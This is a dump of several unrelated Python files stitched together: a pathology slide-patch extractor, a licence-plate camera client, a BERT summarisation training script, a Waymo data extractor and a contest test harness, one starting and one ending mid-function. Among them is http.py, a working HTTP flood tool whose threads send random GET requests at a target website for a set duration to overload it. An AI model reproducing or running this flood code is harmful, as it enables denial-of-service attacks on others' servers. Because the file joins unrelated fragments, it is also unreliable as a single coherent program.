if not self.overwrite and os.path.ispath(output_files_folder_path):
print(
f'File {output_files_folder_path} already exists. Output saving is skipped. To overwrite add --overwrite.')
continue
files_to_process.append((output_files_folder_path, wsi_path, xml_coord_path))
return files_to_process
def process_files(self):
# process the files with coordinates
chunks = np.array_split(self.files_to_process, self.n_threads)
prcs = []
for c in chunks:
p = Process(target=self.process_chunk, args=(c,))
p.start()
prcs.append(p)
[pr.join() for pr in prcs]
def process_chunk(self, chunk):
for c in chunk:
output_folder_path, wsi_path, coord_path = tuple(c)
# make the output folder if it does not exist
if not os.path.isdir(output_folder_path):
os.makedirs(output_folder_path)
# open the wsi and get the coordinates
wsi_img = open_slide(wsi_path)
group_coordinates = self.parse_xml(coord_path)
# iterate over the objects
for group, coords in group_coordinates.items():
for id, coord in coords:
# TODO: add coordinates to patch file
output_file_path = os.path.join(output_folder_path,
f'{os.path.basename(output_folder_path)}_{group}_{id}_{"-".join([str(i) for i in coord])}.png')
# extract the patch
top_left_coord, size = self.get_rectangle_info(coord, group)
png = self.extract_crop(wsi_img, top_left_coord, size)
# save the image
print(f'Saving image {output_file_path}')
Image.fromarray(png[:, :, :3]).save(output_file_path)
def get_rectangle_info(self, asap_coord, group):
if group == 'hotspot':
top_left_coord = [int(i) for i in asap_coord[0]]
size = asap_coord[2][0] - asap_coord[0][0]
elif group == 'lymphocytes':
top_left_coord = [int(i-self.lymph_patch_size/2) for i in asap_coord]
size = self.lymph_patch_size
elif group == 'tumorbuds':
top_left_coord = [int(i-self.tb_patch_size/2) for i in asap_coord]
size = self.tb_patch_size
else:
print('Invalid group')
return
return top_left_coord, size
def parse_xml(self, file_path):
# reads the xml files and retrieves the coordinates of all elements with the coord_annotation_tag
tree = ET.parse(file_path)
root = tree.getroot()
annotations_elements = {g: [] for g in self.groups}
for i in root.iter('Annotation'):
if i.attrib['PartOfGroup'] in annotations_elements:
annotations_elements[i.attrib['PartOfGroup']].append(i)
annotations = {g: [] for g in self.groups}
for group, element_list in annotations_elements.items():
for element in element_list:
if element.attrib['Type'] == 'Dot':
annotation = [[float(i.attrib['X']), float(i.attrib['Y'])] for i in element.iter('Coordinate')][0]
else:
annotation = [[float(i.attrib['X']), float(i.attrib['Y'])] for i in element.iter('Coordinate')]
# get the id (used as node id later)
annot_id = int(element.attrib['Name'].split(' ')[-1])
annotations[group].append((annot_id, annotation))
return annotations
def extract_crop(self, wsi_img, top_left_coord, size):
# crop the region of interest from the mrxs file on the specified level
# get the level and the dimensions
id_level = np.argmax(np.array(wsi_img.level_downsamples) == self.level)
dims = wsi_img.level_dimensions[id_level]
# TODO make sure the dimension we want to crop are within the image dimensions
# extract the region of interest
img = wsi_img.read_region(top_left_coord, id_level, (size, size))
# Convert to img
img = np.array(img)
img[img[:, :, 3] != 255] = 255
return img
def parse_matched_files_excel(self) -> pd.DataFrame:
df = pd.read_excel(self.matched_files_excel, sheet_name=self.matched_excel_info['sheet_name'], engine='openpyxl')
# remove two empty top lines and set third line to header
df.columns = df.iloc[2]
df = df.iloc[3:]
# drop all rows that do not contain 0 or 1 in column "Need resection?" (excluded because no data available)
df = df.drop(df[~df["Need resection?"].isin([0, 1])].index)
# drop all rows that do not contain a file name
# TODO: make this neater
df = df[df[self.matched_excel_info['wsi_col']].notna()]
df = df[df[self.matched_excel_info['file_id_col']].notna()]
df = df.drop(df[df[self.matched_excel_info['wsi_col']].isin(["tbd", "na"])].index)
df = df.drop(df[df[self.matched_excel_info['file_id_col']].isin(["tbd", "na"])].index)
return df
if __name__ == '__main__':
fire.Fire(BTPatchExtractor).process_files()
|
anpr_camera_stream.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
import argparse
import csv
import io
import os
from datetime import datetime
from threading import Thread
import cv2
import requests
from PIL import Image
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
def parse_arguments():
parser = argparse.ArgumentParser(
description=
'Read license plates from a RTSP stream and save the result in a CSV file.',
epilog=
'For example: anpr_camera_stream.py --camera rtsp://192.168.1.2:5554/camera --api-key TOKEN --regions fr --output /path/to/output.csv'
)
parser.add_argument('--api-key', help='Your API key.', required=True)
parser.add_argument('--camera', help='RTSP stream url.', required=True)
parser.add_argument(
'--regions',
help='Regions http://docs.platerecognizer.com/#regions-supported.',
required=False)
parser.add_argument('--output', help='CSV output file.', required=True)
parser.add_argument(
'--show-image',
help='Show a window with the frame being sent for recognition.',
action='store_true')
parser.add_argument(
'--inference-server',
help='Server used for recognition. Default to cloud server.',
default='https://api.platerecognizer.com/v1/plate-reader/')
return parser.parse_args()
class ThreadedCamera(object):
def __init__(self, args):
self.capture = cv2.VideoCapture(args.camera, cv2.CAP_FFMPEG)
self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 1)
if not self.capture.isOpened():
print('No stream available: ' + args.camera)
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
self.frame = None
self.status = False
def update(self):
while self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
def get_frame(self,):
if self.frame is None or not self.status:
return
cv2.waitKey(1)
return self.frame
def capture(args, writer):
camera = ThreadedCamera(args)
while camera.capture.isOpened():
frame = camera.get_frame()
if frame is None:
continue
if args.show_image:
cv2.imshow('frame', frame)
buffer = io.BytesIO()
im = Image.fromarray(frame)
im.save(buffer, 'JPEG')
buffer.seek(0)
response = requests.post(
args.inference_server,
files=dict(upload=buffer),
data=dict(regions=args.regions or ''),
headers={'Authorization': 'Token ' + args.api_key})
res = response.json()
for result in res['results']:
writer.writerow(
dict(date=datetime.today().strftime('%x %X'),
license_plate=result['plate'],
score=result['score'],
dscore=result['dscore'],
vehicle_type=result['vehicle']['type']))
def main():
args = parse_arguments()
with open(args.output, 'w') as output:
fields = ['date', 'license_plate', 'score', 'dscore', 'vehicle_type']
writer = csv.DictWriter(output, fieldnames=fields)
writer.writeheader()
capture(args, writer)
if __name__ == "__main__":
main()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import heapq
import torch
from pytorch_pretrained_bert import BertConfig
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import Summarizer
from models.trainer import build_trainer
from others.logging import logger, init_logger
from others.utils import test_rouge, rouge_results_to_str
import models.data_util as du
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
#for i, cp in enumerate(cp_files):
for i, cp in enumerate(cp_files[-30:]): #revised by Keping
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
#if the model currently under validation is 10 models further from the best model, stop
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step, valid_by_rouge=args.valid_by_rouge)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
#model.load_cp(checkpoint) #TODO: change it back to strict=True
model.load_cp(checkpoint, strict=False)
model.eval()
trainer = build_trainer(args, device_id, model, None)
#if False:
#args.block_trigram = True
#if not args.only_initial or args.model_name == 'seq':
if args.model_name == 'base':
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer.test(test_iter,step)
else:
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer.iter_test(test_iter,step)
#for iterative ranker, evaluate both initial ranker and iterative ranker
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
# temp change for reducing gpu memory
model = Summarizer(args, device, load_pretrained_bert=True)
#config = BertConfig.from_json_file(args.bert_config_path)
#model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
if args.train_from != '': #train another part from beginning
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint, strict=False)
# keys can not match
#optim = model_builder.build_optim(args, model, checkpoint)
optim = model_builder.build_optim(args, model, None)
if args.model_name == "ctx" and args.fix_scorer:
logger.info("fix the saliency scorer")
#for param in self.bert.model.parameters():
for param in model.parameters():
param.requires_grad = False
if hasattr(model.encoder, "selector") and model.encoder.selector is not None:
for param in model.encoder.selector.parameters():
param.requires_grad = True
#print([p for p in model.parameters() if p.requires_grad])
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
_, neg_valid_loss = trainer.train(train_iter_fct, args.train_steps)
while len(neg_valid_loss) > 0:
#from 3rd to 2nd to 1st.
neg_loss, saved_model = heapq.heappop(neg_valid_loss)
print(-neg_loss, saved_model)
step = int(saved_model.split('.')[-2].split('_')[-1])
test(args, device_id, saved_model, step)
logger.info("Finish!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
#parser.add_argument("-bert_config_path", default='../bert_config_uncased_base_small.json')
parser.add_argument("-bert_config_path", default='config/bert_config_uncased_base.json')
parser.add_argument("-model_name", default='ctx', type=str, choices=['base', 'ctx', 'seq'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test','lead','oracle','getrouge'])
parser.add_argument("-sent_sel_method", default='truth', type=str, choices=['truth','lead','model'])
parser.add_argument("-max_label_sent_count", default=3, type=int)
parser.add_argument("-label_format", default='soft', type=str, choices=['soft', 'greedy'], help = "soft:distribution from rouge scores; greedy: sentences with max 3-k(max sentetence limite - number of selected sentences) ROUGE scores set to 1 the other set to 0")
parser.add_argument("-use_rouge_label", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-use_doc", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-salience_softmax", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-valid_by_rouge", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-loss", default='wsoftmax', type=str, choices=['bce','wsoftmax'])
parser.add_argument("-aggr", default='last', type=str, choices=['last', 'mean_pool', 'max_pool'])
# if it is last, only embeddng in step t-1 is used to predict setence in step t, same as in translation
parser.add_argument("-rand_input_thre", default=1.0, type=float, help="the probability of keep the original labels of the selected sentences")
parser.add_argument("-seg_count", default=30, type=int, help="how many segs to divide similarity score")
parser.add_argument("-ngram_seg_count", default='20,20,20', type=str, help="seg count for unigram, bigram and trigram, has to be 3 int separated with comma" )
parser.add_argument("-bilinear_out", default=10, type=int, help="dimension of the bilinear output")
parser.add_argument("-temperature", default=20, type=float)
parser.add_argument("-fix_scorer", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-max_epoch", default=2, type=int)
parser.add_argument("-batch_size", default=3000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=2048, type=int)
parser.add_argument("-heads", default=8, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=0.002, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='noam', type=str)
parser.add_argument("-warmup_steps", default=10000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=2000, type=int)
parser.add_argument("-save_model_count", default=3, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=50, type=int)
parser.add_argument("-train_steps", default=50000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-report_precision", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
#this variable should not be set on gypsum
#os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
os.system('mkdir -p %s' % (os.path.dirname(args.log_file)))
#if not args.bert_data_path.endswith("cnndm") and not args.bert_data_path.endswith("msword"):
# args.bert_data_path = args.bert_data_path + "/cnndm"
#for notebook running, cnndm is not a directory name, it is prefix
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size>1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
if cp == '':
model_dir = args.model_path
print(model_dir)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
for cp in cp_files:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
elif (args.mode == 'getrouge'):
if args.model_name == 'base':
pattern = '*step*initial.candidate'
else:
pattern = '*step*.candidate' #evaluate all
candi_files = sorted(glob.glob("%s_%s" % (args.result_path, pattern)))
#print(args.result_path)
#print(candi_files)
for can_path in candi_files:
gold_path = can_path.replace('candidate', 'gold')
rouge1_arr, rouge2_arr = du.compute_metrics(can_path, gold_path)
step = os.path.basename(gold_path)
precs_path = can_path.replace('candidate', 'precs')
all_doc_ids = du.read_prec_file(precs_path)
rouge_str, detail_rouge = test_rouge(args.temp_dir, can_path, gold_path, all_doc_ids, show_all=True)
logger.info('Rouges at step %s \n%s' % (step, rouge_str))
result_path = can_path.replace('candidate', 'rouge')
if detail_rouge is not None:
du.output_rouge_file(result_path, rouge1_arr, rouge2_arr, detail_rouge, all_doc_ids)
|
http.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
print("\033[1;33m"+"[!]"+"\033[0m"+" This site is under CloudFlare protection.")
if input("\033[1;77m"+"[?]"+"\033[0m"+" Continue HTTP attack? (y/n): ").strip(" ").lower() != "y":
exit()
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting HTTP attack...")
threads_list = []
# Load 25 random user agents
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" HTTP packet was sent! Packet size: " + str(len(payload)) + ".")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" HTTP attack completed.")
|
1extract_image_label.py
|
"""
Taken and Customized from:
https://github.com/KushalBKusram/WaymoDataToolkit
"""
"""
As step 1
Extract images and labels from segment
"""
import time
import threading
from datetime import timedelta
import util_image_label as WODKit
if __name__=="__main__":
#Path where the input and output folders are available
main_path = "/home/eyuell/Desktop/ForD/WAYMO"
segments_dir = main_path + "/input/segment"
output_dir = main_path + "/output"
start = time.time()
print('Processing . . . \r')
toolkit = WODKit.ToolKit(training_dir=segments_dir, save_dir=output_dir)
# clear images, labels, consolidation and ped lists from previous execution
toolkit.refresh_dir(dir="{}/camera/images".format(output_dir))
toolkit.refresh_dir(dir="{}/camera/labels".format(output_dir))
toolkit.refresh_dir(dir="{}/consolidation".format(output_dir))
open("{}/camera/ped_frames_file.txt".format(output_dir), 'w').write("{}".format(""))
# prepare for progress monitoring
i = 0
segments = toolkit.list_training_segments()
size = len(segments)
# Process through all segments
for segment in segments:
i += 1
#print('Processing . . . {}/{} ({:.2f}%) \r'.format(i, size, (i/size) * 100))
print('Processing . . . segment {} of {}\r'.format(i, size))
threads = []
toolkit.assign_segment(segment, i)
t1 = threading.Thread(target=toolkit.extract_camera_images)
t1.start()
threads.append(t1)
for thread in threads:
thread.join()
toolkit.consolidate()
#break # if only for one segment
# Concluding
end = time.time()
elapsed = end - start
t_del = timedelta(seconds=elapsed)
if i == size:
print('\nDone! Duration= {}\n'.format(t_del))
else:
print('\nExited! Duration= {}\n'.format(t_del))
|
tester.py
|
#!/usr/bin/env python3
# Author: Psyho
# Twitter: https://twitter.com/fakepsyho
#TODO:
# HIGH PRIORITY:
# -create proper ReadMe
# -more error checking / clearer error messages
# -fix grouping/filtering if data file doesn't contain all test cases
# -add warnings if data is not present for all test cases?
# -config: merge subgroups (you need at least one?)
# -fix double printing progress bug
# -above + customization of scripts in the config
# -mode show simple histogram for stats
# -test functionality for atcoder
# -double check that topcoder functional is not broken
# -find a way to make atcoder score consistent with local (score_mul parameter? / is it needed?)
# -add option to print parsed commands (or maybe just print when encountered an error?)
# -add an option for custom scoreboard ordering? (would simply show_XXX options)
# LOW PRIORITY:
# -add a future proof mechanism for missing lines in config files? (will happen if someones updates the tester but the config file will stay the same)
# -add option to shorten group names?
# -use --tests for --find?
# -add support for custom scoring (cfg would be python code?)
# -add RUNNER parameters (like for hash code) (Moved to RUNNER?)
# -add batching? (Moved to RUNNER?)
# -sync with RUNNER? (how?)
# -add cleanup on ctrl+c (what that would be?)
# -change to subparsers (exec / show / find?)
# -simplify parameters in config (some parameters are redundant)
# -add autodetect for atcoder run/gen cmd (should be easy if files have original names)
# -add some lock against running atcoder's gen multiple times at the same time
# -improve script generation?
# ???:
# -show: add transpose?
# -is it possible to monitor cpu% and issue warning (too many threads); useful for running on cloud with tons of threads
# -add html export option for --show?
# -add comments to code (explaining functions should be enough)
# -add more annotations to functions
import tabulate
import re
import math
import sys
import os
import argparse
import subprocess
import glob
import json
import time
import configparser
import shutil
import traceback
import _thread
from typing import List, Dict, Union
import queue
from threading import Thread
from . import __version__
args = None
cfg = None
DEFAULT_CONFIG_PATH = 'tester.cfg'
tests_queue = queue.Queue()
results_queue = queue.Queue()
def try_str_to_numeric(x):
if x is None:
return None
try:
return int(x)
except ValueError:
try:
return float(x)
except ValueError:
return x
def fatal_error(msgs, exit_main=False):
if isinstance(msgs, str):
msgs = [msgs]
print('Fatal Error:', msgs[0])
for msg in msgs[1:]:
print(msg)
if exit_main:
os._exit(1)
else:
sys.exit(1)
def run_test(test) -> Dict:
seed = test['seed']
run_dir = args.name or '_default'
output_dir = cfg["general"]["tests_dir"] + (f'/{run_dir}' if cfg["general"]["merge_output_dirs"].lower() == "false" else '')
os.makedirs(output_dir, exist_ok=True)
def parse_cmd(s):
s = s.replace('%SEED%', str(seed))
for i in range(1, 10):
s = s.replace(f'%SEED0{i}%', f'{seed:0{i}}')
s = s.replace('%OUTPUT_DIR%', output_dir)
s = s.replace('%TESTER_ARGS%', args.tester_arguments)
if '%GEN_INPUT%' in s:
s = s.replace('%GEN_INPUT%', str(test['path']))
return s
cmd = parse_cmd(cfg['general']['cmd_tester'])
output_files = [parse_cmd(s) for s in cfg['general']['output_files'].split(',')]
# print(cmd)
# print(output_files)
subprocess.run(cmd, shell=True)
rv = {'id': seed}
for output_file in output_files:
with open(output_file) as f:
for line in f:
# XXX: maybe change to regex if they aren't much slower
tokens = line.split()
if len(tokens) == 3 and tokens[0] == 'Score' and tokens[1] == '=':
rv['score'] = float(tokens[2])
if len(tokens) == 7 and tokens[0] == 'Score' and tokens[1] == '=' and tokens[3] == 'RunTime' and tokens[4] == '=' and tokens[6] == 'ms':
rv['score'] = float(tokens[2][:-1])
rv['time'] = float(tokens[5])
if len(tokens) == 4 and tokens[0] == '[DATA]' and tokens[2] == '=':
rv[tokens[1]] = try_str_to_numeric(tokens[3])
if cfg['general']['keep_output_files'].lower() != 'true':
os.remove(output_file)
if 'score' not in rv:
print(f'\r[Error] Seed: {seed} cointains no score')
return rv
def find_res_files(dir='.'):
return glob.glob(f'{dir}/*{cfg["general"]["results_ext"]}')
def load_res_file(path) -> Dict[int, float]:
if not os.path.exists(path):
fatal_error(f'Cannot locate {path} results file')
with open(path) as f:
lines = f.read().splitlines()
results = [json.loads(line) for line in lines]
return {result['id']: result for result in results}
def process_raw_scores(scores: List[float], scoring: str) -> List[float]:
if scoring=='raw':
return scores
if scoring=='min':
best_score = min([math.inf] + [score for score in scores if score >= 0])
return [best_score / score if score >= 0 else 0 for score in scores]
if scoring=='max':
best_score = max([0] + [score for score in scores if score >= 0])
return [score / best_score if score > 0 else 0 for score in scores]
fatal_error(f'Unknown scoring function: {scoring}')
def apply_filter(tests, data, filter):
var, range = filter.split('=')
if '-' in range:
lo, hi = range.split('-')
lo = try_str_to_numeric(lo) if lo else min([data[test][var] for test in tests])
hi = try_str_to_numeric(hi) if hi else max([data[test][var] for test in tests])
return [test for test in tests if lo <= data[test][var] <= hi]
else:
value = try_str_to_numeric(range)
return [test for test in tests if data[test][var] == value]
def show_summary(runs: Dict[str, Dict[int, float]], tests: Union[None, List[int]] = None, data=None, groups=None, filters=None):
if not tests:
tests_used = [set(run_results.keys()) for run_name, run_results in runs.items()]
tests = tests_used[0].intersection(*tests_used[1:])
else:
# TODO: error check if tests are cointained in intersection of all results files?
pass
if not tests:
fatal_error('There are no common tests within the results files (maybe one of the results files is empty?)')
if not data and (filters or groups):
fatal_error('Filters/Groups used but no data file is provided')
if filters:
initial_tests_no = len(tests)
for filter in filters:
tests = apply_filter(tests, data, filter)
print(f'Filtered {initial_tests_no} tests to {len(tests)}')
group_names = []
group_tests = []
group_names.append('Score')
group_tests.append(tests)
if groups:
for group in groups:
if '=' in group:
group_names.append(group)
group_tests.append(apply_filter(tests, data, group))
elif '@' in group:
var, bins = group.split('@')
bins = int(bins)
values = sorted([data[test][var] for test in tests])
# XXX: probably there's a better way to split values into bins
pos_start = 0
for bin in range(bins):
pos_end = (bin+1) * len(tests) // bins
while pos_end < len(tests) and values[pos_end] == values[pos_end-1]: pos_end += 1
if pos_end <= pos_start:
continue
group_name = f'{var}={values[pos_start]}-{values[pos_end-1]}'
group_names.append(group_name)
group_tests.append(apply_filter(tests, data, group_name))
pos_start = pos_end
else:
var = group
var_set = sorted(set([data[test][var] for test in tests]))
for value in var_set:
group_names.append(f'{var}={value}')
group_tests.append(apply_filter(tests, data, f'{var}={value}'))
